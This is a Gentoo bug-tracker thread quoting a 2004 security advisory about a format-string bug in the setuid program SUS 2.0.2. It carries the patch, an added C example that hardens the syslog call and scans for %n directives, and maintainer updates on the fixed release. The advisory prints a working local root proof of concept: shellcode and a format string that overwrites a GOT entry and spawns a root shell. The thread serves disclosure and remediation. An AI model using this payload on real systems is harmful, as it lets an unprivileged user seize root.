[pasted from e-mail]

LSS Security Advisory #1: GENTOO SUS 2.0.2 local root exploit
-------------------------------------------------------------

Advisory ID: 1
Impact: local user can gain root privileges
Vendor status: notified
Vulnerability type: local
Risk: High
Bug founder: Leon Juranic <ljuranic@lss.hr>
Date: 4.6.2004

===[ Overview

SUS is a suid root program that allows an ordinary user to execute some programs as the superuser. SUS's relatives are super, sudo and the very insecure calife. SUS is setuid root by default.

===[ Vulnerability

There is a very simple format string bug in the log() function that any local user can exploit to gain root privileges. The format string vulnerability is the result of the very common incorrect syslog() call, and can be exploited from the command line.

log.c:
--------
void log(char * msg)
{
    ...
    openlog(ident, LOG_PID|LOG_CONS, facility);
    syslog(level,msg);   // <- VULNERABILITY
    ...
}
--------

===[ PoC exploit

In this PoC example, we will put shellcode in the HACK environment variable, and overwrite the GOT entry of the getspnam() function with the HACK address. There are NOP opcodes in the HACK variable, but in fact they are not needed. In the end, a root shell is spawned.
getspnam() address -> 08061780
HACK variable address -> 0xbffffb54

[root@laptop root]# objdump -R /usr/bin/sus | grep getspnam
08061780 R_386_JUMP_SLOT getspnam
[root@laptop root]# su ljuranic
[ljuranic@laptop ljuranic]$ export HACK=`perl -e 'print "\x90" x 100; print "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53
\x89\xe1\xcd\x80"'`
[ljuranic@laptop ljuranic]$ ./env HACK
bffffb54
[ljuranic@laptop ljuranic]$ id
uid=500(ljuranic) gid=500(ljuranic) groups=500(ljuranic)
[ljuranic@laptop ljuranic]$ sus -V
Version 2.0.2
[ljuranic@laptop ljuranic]$ ls -al /usr/bin/sus
-rws--x--x 1 root root 126189 Jan 12 18:58 /usr/bin/sus
[ljuranic@laptop ljuranic]$ sus `perl -e 'print "B\x80\x17\x06\x08\x81\x17\x06
\x08\x82\x17\x06\x08\x83\x17\x06\x08A_____%.231u%257\\$n%.167u%258\\$n%.4u%259
\\$n%.192u%260\\$n"'`
sh-2.05a# id
uid=0(root) gid=0(root) groups=0(root)
sh-2.05a#

===[ Fix

Quick patch for log.c:

--------
153c153
< syslog(level,msg);
---
>> syslog(level,"%s",msg);
--------
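Review bot: the replacement is the right fix for this hunk: with msg passed as the argument of a literal "%s" format, an argument like the %...$n string in the PoC is written to the log verbatim instead of being interpreted. Two small points: the replacement line is shown with a doubled `>>`, which looks like e-mail quoting residue, so the line to apply is `> syslog(level,"%s",msg);`; and building with -Wformat-security (GCC/Clang) would have flagged the original `syslog(level,msg)` at compile time and is a cheap way to check that no other non-literal format call remains in log.c.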
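Added example, not the advisory's or the sus project's code: the fixed form of the log() call above, together with a scanner that counts printf directives (and %n in particular) in an untrusted argument so that a log-monitoring rule can alert on attempts like the PoC string. The "sus-example" ident and the LOG_AUTH facility are assumptions, and the sample string in the test is the one from the PoC.

```c
/* Added example (not sus project code): hardened log() from the advisory's
 * patch plus a scanner for printf directives in an untrusted argument. */
#include <string.h>
#include <syslog.h>

/* Skip printf flags, width, precision, positional "$" and length modifiers. */
static const char *skip_modifiers(const char *p)
{
    while (*p && strchr("0123456789.$-+ #*'hlLqjzt", *p))
        p++;
    return p;
}

/* Count conversions in s ("%%" is a literal percent). If writes is non-NULL it
 * receives the number of %n directives, the ones that make a format bug write. */
int scan_format_directives(const char *s, int *writes)
{
    int n = 0;
    if (writes) *writes = 0;
    for (const char *p = s; *p;) {
        if (*p != '%') { p++; continue; }
        if (p[1] == '%') { p += 2; continue; }   /* escaped percent */
        n++;
        p = skip_modifiers(p + 1);
        if (*p == 'n' && writes)
            (*writes)++;
        if (*p) p++;                             /* step past the conversion char */
    }
    return n;
}

int count_write_directives(const char *s)
{
    int writes;
    scan_format_directives(s, &writes);
    return writes;
}

/* Hardened log(): msg is always the argument of a literal "%s", as in the
 * advisory's patch, so it is never parsed as a format. Arguments that carry
 * directives also get a LOG_WARNING line for monitoring. */
void log_command(int level, const char *msg)
{
    int writes, n = scan_format_directives(msg, &writes);
    openlog("sus-example", LOG_PID | LOG_CONS, LOG_AUTH);   /* assumed ident/facility */
    if (n > 0)
        syslog(LOG_WARNING, "argument carries %d format directives (%d %%n): %s",
               n, writes, msg);
    syslog(level, "%s", msg);
    closelog();
}
```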
Created attachment 39526: sus-2.0.2 local root vuln fix
Please commit a patched ebuild so we can start stable marking if you don't mark stable.
Fixed ebuild is already in portage as sus-2.0.2-r1.ebuild, and marked stable.
Kumba, thx. Security, please draft.
from http://pdg.uow.edu.au/sus/CHANGES

2.0 - July 2002
    First production release
2.0.1 - 2.0.5
    Numerous cleanups, no functionality changes
2.0.6 - Sept 14, 2004
    Fixed a security problem in call to syslog in log.c. All users should upgrade to 2.0.6 as soon as possible. Many thanks to Leon Juranic at the University of Zagreb for finding this problem.
hmm, I checked the site yesterday, and saw no new version. Must've posted it after I checked. I'll get 2.0.6 into portage soon.
Thx Kumba. GLSA 200409-17